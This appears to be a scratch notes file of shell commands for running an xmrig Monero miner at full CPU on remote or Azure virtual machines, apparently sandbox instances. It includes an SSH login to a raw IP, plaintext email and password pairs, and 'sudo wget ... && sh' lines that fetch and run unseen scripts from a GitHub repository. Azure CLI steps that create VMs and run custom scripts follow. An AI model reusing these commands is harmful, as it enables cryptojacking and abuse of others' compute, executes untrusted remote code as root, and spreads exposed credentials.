ssh cat@104.45.14.63

./xmrig --print-time 7 --max-cpu-usage 100 -o xmr.pool.minergate.com:45700 -u adynikez@gmail.com -p x -k --nicehash

0.003029339367
getentee@znatb25xbul30ui.tk
76576dshdksj
hgjh654@#

ausloese@nhatdinhmuaduocxe.info
fgh645#$E

shortline
--------------------
sudo wget https://raw.githubusercontent.com/BigOrt/bigort/master/run.sh && sh run.sh

sudo wget https://raw.githubusercontent.com/BigOrt/bigort/master/short.sh && sh short.sh

---------------------------------------------------------------------------
az vm create \
  --name 75 \
  --resource-group b9e27127-377c-4fe2-a801-8d94339565be \
  --image UbuntuLTS \
  --location westeurope \
  --size Standard_DS3_v2 \
  --admin-username cat \
  --generate-ssh-keys

az vm extension set \
  --resource-group  \
  --vm-name jerry7 \
  --name customScript \
  --publisher Microsoft.Azure.Extensions \
  --settings '{"fileUris":["https://raw.githubusercontent.com/MicrosoftDocs/mslearn-welcome-to-azure/master/configure-nginx.sh"]}' \
  --protected-settings '{"commandToExecute": "./configure-nginx.sh"}'

  az vm open-port \
  --name jerry7 \
  --resource-group  \
  --port 80

  az vm show \
  --name jerry7 \
  --resource-group  \
  --show-details \
  --query [publicIps] \
  --output tsv



